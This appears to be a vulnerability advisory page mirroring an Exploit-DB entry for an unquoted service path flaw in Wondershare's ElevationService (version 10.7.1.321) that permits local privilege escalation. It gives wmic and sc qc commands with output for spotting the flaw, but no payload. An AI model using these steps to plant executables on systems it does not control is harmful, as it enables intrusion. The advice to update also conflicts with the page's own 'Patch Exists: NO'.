Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path

vendor:

Wondershare Driver Install Service help

by:

Luis Sandoval

7.5

CVSS

HIGH

Unquote Service Path

428

CWE

Product Name: Wondershare Driver Install Service help

Affected Version From: 10.7.1.321

Affected Version To: 10.7.1.321

Patch Exists: NO

Related CWE:

CPE: a:wondershare:driver_install_service_help:10.7.1.321

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2020

Wondershare Driver Install Service help 10.7.1.321 – ‘ElevationService’ Unquote Service Path

The Wondershare Driver Install Service help version 10.7.1.321 is vulnerable to an unquoted service path vulnerability. This vulnerability allows an attacker with local access to escalate privileges and execute arbitrary code with elevated privileges. The vulnerable service, ElevationService, has an unquoted service path that could allow an attacker to place a malicious executable in a higher privileged directory, which will be executed when the service is started.

Mitigation:

To mitigate this vulnerability, users are advised to update to the latest version of Wondershare Driver Install Service help.

Source

Exploit-DB raw data:

# Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path
# Date: 2020-11-24
# Exploit Author: Luis Sandoval
# Vendor Homepage: https://www.wondershare.com/
# Software Link: https://www.wondershare.com/drfone/
# Version: 10.7.1.321
# Tested on: Windows 10 Home Single Language x64 Esp

# Service info:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Wondershare Driver Install Service help    ElevationService   C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe     Auto

C:\Users\user>sc qc ElevationService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ElevationService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Wondershare Driver Install Service help
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem